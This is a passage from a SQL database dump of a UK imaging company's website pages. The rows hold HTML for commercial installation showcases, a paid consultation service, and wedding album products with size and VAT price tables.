criteria.</font>','','','','','','','','','N','2010-06-01 10:48:24','2010-05-20 07:56:17',61),(62,'Layout1','9','Installation 4','com-sol-inst-4.php','Installation 4','Installation 4','Installation 4','<br />\r\n<p><img alt=\"\" align=\"left\" width=\"747\" height=\"560\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Com_4.jpg\" /><br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<font color=\"#ec008c\"><strong>Featured Product:<br />\r\n</strong><font color=\"#000000\">Product featured is one of our canvas wraps. These</font><font color=\"#333333\"> are a high grade, <br />\r\nsuperior quality finished product which are printed directly onto artists\' <br />\r\ncanvas using pigmented inks, heat sealed laminated for durabilty and <br />\r\nprotection, then hand stretched onto purpose built 44mm stretcher frames. </font><br />\r\n<font color=\"#ec008c\"><br />\r\n<strong>Colour Used:</strong></font><br />\r\n<font color=\"#000000\">Image printed directly onto canvas from our online image library.<br />\r\n<br />\r\n</font><strong><font color=\"#ec008c\">Approx Size:</font><br />\r\n</strong></font><font color=\"#000000\">60" w x 30" h. As all aspects of our products are made in-house we have the facility <br />\r\nto alter sizes and dimensions to create a \' space utilising\' design that best suits <br />\r\nyour workplace or branding criteria.</font></p>','','','','','','','','','N','2010-06-01 10:48:57','2010-05-20 07:58:53',62),(63,'Layout1','9','Installation 5','com-sol-inst-5.php','Installation 5','Installation 5','Installation 5','<br />\r\n<p><img alt=\"\" align=\"left\" width=\"747\" height=\"629\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Com_5.jpg\" /><br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<font color=\"#ec008c\"><strong>Featured Product:<br />\r\n</strong><font color=\"#000000\">Product featured is a bespoke take on our </font><font color=\"#ec008c\"><strong>\'contour\'</strong> </font><font color=\"#000000\">cutting edge acrylic. <br />\r\nThis is a truly stunning and original piece utilising segmented image and <br />\r\nback panels giving a really striking overall finish.<br />\r\n<br />\r\n</font><strong><font color=\"#ec008c\">Colour Used:</font><br />\r\n</strong><font color=\"#000000\">Matching the acrylic panels to the qualities of the imagery used we have used <br />\r\nsatin blue. <br />\r\n<br />\r\n</font><strong><font color=\"#ec008c\">Approx Size:</font><br />\r\n</strong></font><font color=\"#000000\">9\' w x 6\' h. As all aspects of our products are made in-house we have the facility to<br />\r\nalter sizes and dimensions to create a \' space utilising\' design that best suits your <br />\r\nworkplace or branding criteria.</font></p>','','','','','','','','','N','2010-06-01 10:49:15','2010-05-20 08:01:15',63),(64,'Layout1','9','Installation 6','com-sol-inst-6.php','Installation 6','Installation 6','Installation 6','<br />\r\n<p><img alt=\"\" align=\"left\" width=\"747\" height=\"463\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Com_6.jpg\" /><br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<font color=\"#ec008c\"><font color=\"#000000\"><br />\r\n</font><strong>Featured Product:<br />\r\n</strong><font color=\"#000000\">Products featured are two of our \'crystal\' frames from our concept framing section. <br />\r\nWe can also produce solutions to cater for more traditional surroundings. In this <br />\r\ninstance our glass fronted frame with colour co-ordinated slip mount gives a <br />\r\nharmonious balance between traditional decor and modern presentation.<br />\r\n<br />\r\n</font><strong><font color=\"#ec008c\">Colour Used:</font><br />\r\n</strong><font color=\"#000000\">We have used moulding option 1 in this presentation - for more options visit the <br />\r\ncrystal page in our concept framing section. The imagery used within the frames <br />\r\ncan be found in our online image library.<br />\r\n<br />\r\n</font><strong><font color=\"#ec008c\">Approx Size:</font><br />\r\n</strong></font><font color=\"#000000\">Each frame approx 38" w x 28" h . As all aspects of our products are made in-house <br />\r\nwe have the facility to alter sizes and dimensions to create a \' space utilising\' design<br />\r\nthat best suits your workplace or branding criteria.</font></p>','','','','','','','','','N','2010-06-01 10:49:44','2010-05-20 08:02:50',64),(65,'Layout1','9','Installation 7','com-sol-inst-7.php','Installation 7','Installation 7','Installation 7','<br />\r\n<p><img alt=\"\" align=\"left\" width=\"747\" height=\"498\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Com_8(1).jpg\" /><br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<font color=\"#ec008c\"><strong><br />\r\nFeatured Product:<br />\r\n</strong><font color=\"#000000\">The main product is a clustered sleek arrangement using varying sizes of images <br />\r\nand depth of presentation to really bring the overall composition to life. The secondary <br />\r\nproduct on the back wall is a combination of the </font><font color=\"#ec008c\"><strong>\'contour\' </strong></font><font color=\"#000000\">acrylic. As each piece is <br />\r\nmade separately, we have the facility to create configurations and arrangements based <br />\r\nspecifically on your requirements.<br />\r\n<br />\r\n</font><strong><font color=\"#ec008c\">Colour Used:</font><br />\r\n</strong><font color=\"#000000\">Matching the acrylic panels to the qualities of the imagery and surroundings we have <br />\r\nused our soft brown acrylic.<br />\r\n<br />\r\n</font><strong><font color=\"#ec008c\">Approx Size:</font><br />\r\n</strong></font><font color=\"#000000\">Main product 5\' x 4\' h secondary product 7\' w x 4\' h. As all aspects of our products are <br />\r\nmade in-house we have the facility to alter sizes and dimensions to create a \' space utilising\' <br />\r\ndesign that best suits your workplace or branding criteria.</font></p>','','','','','','','','','N','2010-06-01 10:50:30','2010-05-20 08:04:46',65),(66,'Layout1','9','Installation 8','com-sol-inst-8.php','Installation 8','Installation 8','Installation 8','<br />\r\n<p><img alt=\"\" align=\"left\" width=\"747\" height=\"531\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Com_9.jpg\" /><br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<font color=\"#ec008c\"><strong>Featured Product:<br />\r\n</strong><font color=\"#000000\">A combination of our </font><font color=\"#ec008c\"><strong>\'contour\' </strong></font><font color=\"#000000\">acrylic product which can be found in our cutting edge <br />\r\nacrylics section, this is another example of how we can take existing modular products, </font><font color=\"#ec008c\"> <br />\r\n</font><font color=\"#000000\">which are designed equilaterally for such a purpose, and arrange them in a manner to <br />\r\ninject life into your desired area. <br />\r\n<br />\r\n</font><strong><font color=\"#ec008c\">Colour Used:</font><br />\r\n</strong><font color=\"#000000\">Matching the acrylic panels to the qualities of the imagery and surroundings, we have <br />\r\nused our colour option 1. For more options, visit the colour options page within our <br />\r\ncutting edge acrylic section.<br />\r\n<br />\r\n</font><strong><font color=\"#ec008c\">Approx Size:</font><br />\r\n</strong></font><font color=\"#000000\">80" w x 60" h. As all aspects of our products are made in-house we have the facility <br />\r\nto alter sizes and dimensions to create a \' space utilising\' design that best suits your <br />\r\nworkplace or branding criteria.</font></p>','','','','','','','','','N','2010-06-01 10:51:15','2010-05-20 08:06:48',66),(67,'Layout1','9','Consultation Service','com-sol-inst-con-service.php','Consultation Service','Consultation Service','Consultation Service','<p><br />\r\nWe at Paul Grahams offer an in-depth consultation service and will arrange<br />\r\nan appointment to best suit your schedule at either our office or your business <br />\r\npremises.<br />\r\n<br />\r\nOn attendance at your premises we will take you through our various visual and <br />\r\ndisplay solutions from our extensive product ranges which include acrylics, frames, <br />\r\ncanvas wraps and graphic display modules.<br />\r\n<br />\r\nAfter ascertaining which product best fits your criteria, we will carry out a precise<br />\r\nmeasurement of the area in which the final installation is to take place. Visuals <br />\r\nwill only be supplied if the item is a bespoke non-catalogue item.<br />\r\n<br />\r\nThe initial fee for this in-depth personal service is £100 + vat which is non-refundable <br />\r\nif no work after the initial consultation is undertaken, but is redeemable off the total <br />\r\ncost of any product purchased after the consultation with a pre vat value of £700.00.<br />\r\n<br />\r\nWe will work very closely with you through each aspect of any project from intial<br />\r\nconception to final production.<br />\r\n<br />\r\nAt completion of any acrylic, frame or canvas product, we also offer an<br />\r\ninstallation service. The installation service is priced on quotation.<br />\r\n<br />\r\nTo organise a consultation please contact us direct on (01254) 200330.</p>','','','','','','','','','Y','2010-06-03 16:28:18','2010-05-20 08:09:24',67),(68,'Layout2','10','Riyadh','wed-albums-riyadh.php','Riyadh','Riyadh','Riyadh','','PROD_68.jpg','','<span class=\'pinksmalltitle\'> Riyadh</span>','<font size=\"2\"><br />\r\nSimplicity is the key to this range. The finest materials coupled with exquisite workmanship combine to create a timeless classic. The Riyadh continues to be one of our best selling albums. </font>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p>All prices are +vat<br />\r\n<br />\r\n<table style=\"width: 184px; height: 271px\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"184\" height=\"271\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\">\r\n <p><strong><font color=\"#ec008c\">Size</font></strong></p>\r\n </td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Leatherette <br />\r\n <font color=\"#000000\">Leather</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n 40x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\"><br />\r\n £ 400 +vat<br />\r\n </font><font color=\"#000000\">£ 440 +vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x35cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 400 +vat<br />\r\n <font color=\"#000000\">£ 440 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x28cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 350 +vat<br />\r\n <font color=\"#000000\">£ 385 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 350 +vat<br />\r\n <font color=\"#000000\">£ 385 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x24cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 250 +vat<br />\r\n <font color=\"#000000\">£ 275 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">25x25cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 250 +vat<br />\r\n <font color=\"#000000\">£ 275 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x20cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 200 +vat<br />\r\n <font color=\"#000000\">£ 220 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x18cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 200 +vat<br />\r\n <font color=\"#000000\">£ 220 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">16x12cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 100 +vat<br />\r\n <font color=\"#000000\">£ 110+vat</font></font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n </p>','','','Y','2010-07-03 11:38:44','2010-05-20 09:43:31',68),(69,'Layout2','10','Florence','wed-albums-florence.php','Florence','Florence','Florence','','PROD_69.jpg','','<span class=\'pinksmalltitle\'> Florence</span>','<p><br />\r\nThe Florence is one of our best selling album designs. An elegant binding is complemented by an image, crafted and bound into the cover, producing a simply stunning result. The proportion of image and material combination can be varied to alter the style and appearance of the final cover. The image can be printed conventionally and laminated or etched onto brushed aluminium.</p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p> </p>\r\n<p>All prices are +vat<br />\r\n<br />\r\n<table style=\"width: 184px; height: 271px\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"184\" height=\"271\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\">\r\n <p><strong><font color=\"#ec008c\">Size</font></strong></p>\r\n </td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Leatherette <br />\r\n <font color=\"#000000\">Leather</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n 40x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\"><br />\r\n £ 440 +vat<br />\r\n </font><font color=\"#000000\">£ 480 +vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x35cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 440 +vat<br />\r\n <font color=\"#000000\">£ 480 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x28cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 390+vat<br />\r\n <font color=\"#000000\">£ 425 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 390+vat<br />\r\n <font color=\"#000000\">£ 425 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x24cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 290 +vat<br />\r\n <font color=\"#000000\">£ 315 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">25x25cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 290 +vat<br />\r\n <font color=\"#000000\">£ 315 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x20cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 240 +vat<br />\r\n <font color=\"#000000\">£ 260 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x18cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 240 +vat<br />\r\n <font color=\"#000000\">£ 260 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">16x12cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A</font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n </p>','','','Y','2010-05-31 09:39:06','2010-05-20 09:45:43',69),(70,'Layout2','10','Madrid','wed-albums-madrid.php','Madrid','Madrid','Madrid','','PROD_70.jpg','','<span class=\'pinksmalltitle\'> Madrid</span>','<p><br />\r\nUtilising the latest metal etching technology, the Madrid offers an attractive brushed aluminium cover with text and images permanently etched into the surface. The modern appearance and contemporary look of this album continue to make the Madrid a firm favourite.</p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><br />\r\nAll prices are +vat<br />\r\n<br />\r\n<table style=\"width: 184px; height: 271px\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"184\" height=\"271\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\">\r\n <p><strong><font color=\"#ec008c\">Size</font></strong></p>\r\n </td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Leatherette <br />\r\n <font color=\"#000000\">Leather</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n 40x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\"><br />\r\n £ 440 +vat<br />\r\n </font><font color=\"#000000\">N/A</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x35cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 440 +vat<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x28cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 390 +vat<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 390 +vat<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x24cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 290 +vat<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">25x25cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 290+vat<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x20cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 240 +vat<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x18cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 240 +vat<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">16x12cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 140 +vat<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n </p>','','','Y','2010-05-31 09:39:47','2010-05-20 09:47:12',70),(71,'Layout2','10','Kingston','wed-albums-kingston.php','Kingston','Kingston','Kingston','','PROD_71.jpg','','<span class=\'pinksmalltitle\'> Kingston</span>','<p><br />\r\nWith a high grade aluminium effect cover, the Kingston continues to be a very popular wedding album. Three images are sealed and bonded into the cover to create a distinctive and very personal presentation. <br />\r\n<br />\r\nAvailable in black leatherette only.</p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><br />\r\nAll prices are +vat<br />\r\n<br />\r\n<table style=\"width: 184px; height: 271px\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"184\" height=\"271\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\">\r\n <p><strong><font color=\"#ec008c\">Size</font></strong></p>\r\n </td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Leatherette <br />\r\n <font color=\"#000000\">Leather</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n 40x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\"><br />\r\n £ 440 +vat<br />\r\n </font><font color=\"#000000\">N/A</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x35cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 440 +vat<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x28cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 390 +vat<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x24cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">25x25cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x20cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x18cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">16x12cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n </p>','','','Y','2010-05-31 09:43:44','2010-05-20 09:48:32',71),(72,'Layout2','10','Milan','wed-albums-milan.php','Milan','Milan','Milan','','PROD_72.jpg','','<span class=\'pinksmalltitle\'> Milan</span>','<p><br />\r\nThe Milan\'s traditional construction techniques together with a striking full image cover, combine to give this album its enduring appeal. The cover is printed, sealed and then worked into the final album, creating an attractive and eye-catching final design.</p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p> </p>\r\n<p>All prices are +vat<br />\r\n<br />\r\n<table style=\"width: 184px; height: 271px\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"184\" height=\"271\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\">\r\n <p><strong><font color=\"#ec008c\">Size</font></strong></p>\r\n </td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Leatherette <br />\r\n <font color=\"#000000\">Leather</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n 40x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\"><br />\r\n £ 440 +vat<br />\r\n </font><font color=\"#000000\">£ 480 +vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x35cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 440 +vat<br />\r\n <font color=\"#000000\">£ 480 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x28cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 390 +vat<br />\r\n <font color=\"#000000\">£ 425 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 390 +vat<br />\r\n <font color=\"#000000\">£ 425 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x24cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 290 +vat<br />\r\n <font color=\"#000000\">£ 315 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">25x25cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 290 +vat<br />\r\n <font color=\"#000000\">£ 315 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x20cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 240 +vat<br />\r\n <font color=\"#000000\">£ 260 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x18cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 240 +vat<br />\r\n <font color=\"#000000\">£ 260 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">16x12cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n </p>','','','Y','2010-05-31 09:44:21','2010-05-20 09:49:39',72),(73,'Layout2','10','Asmara','wed-albums-asmara.php','Asmara','Asmara','Asmara','','PROD_73.jpg','','<span class=\'pinksmalltitle\'> Asmara</span>','<p><br />\r\nElegant and sophisticated, the Asmara\'s Insert is crafted in brushed aluminium or photographically printed before being sealed and incorporated into the front cover to create a simple yet striking modern design.</p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p> </p>\r\n<p>All prices are +vat<br />\r\n<br />\r\n<table style=\"width: 184px; height: 271px\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"184\" height=\"271\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\">\r\n <p><strong><font color=\"#ec008c\">Size</font></strong></p>\r\n </td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Leatherette <br />\r\n <font color=\"#000000\">Leather</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n 40x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\"><br />\r\n £ 440 +vat<br />\r\n </font><font color=\"#000000\">£ 480 +vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x35cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 440 +vat<br />\r\n <font color=\"#000000\">£ 480 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x28cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 390 +vat<br />\r\n <font color=\"#000000\">£ 425 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 390 +vat<br />\r\n <font color=\"#000000\">£ 425 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x24cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">25x25cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x20cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x18cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">16x12cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n </p>','','','Y','2010-05-31 09:44:59','2010-05-20 09:50:36',73),(74,'Layout2','10','Lyon','wed-albums-lyon.php','Lyon','Lyon','Lyon','','PROD_74.jpg','','<span class=\'pinksmalltitle\'> Lyon</span>','<p><br />\r\nCrafted from the finest leathers, the Lyon offers a more traditional presentation. A raised design is crafted into the front cover to create an album that showcases the art of traditional leathercraft.</p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p> </p>\r\n<p>All prices are +vat<br />\r\n<br />\r\n<table style=\"width: 184px; height: 271px\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"184\" height=\"271\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\">\r\n <p><strong><font color=\"#ec008c\">Size</font></strong></p>\r\n </td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Leatherette <br />\r\n <font color=\"#000000\">Leather</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n 40x30cm</td>\r\n <td valign=\"top\"><strong><br />\r\n <font color=\"#000000\"><font color=\"#ec008c\">N/A<br />\r\n </font>£ 480 +vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x35cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n </font><font color=\"#000000\">£ 480 +vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x28cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n </font><font color=\"#000000\">£ 425 +vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n </font><font color=\"#000000\">£ 425 +vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x24cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n </font><font color=\"#000000\">£ 315 +vat</font></strong></td>\r\n 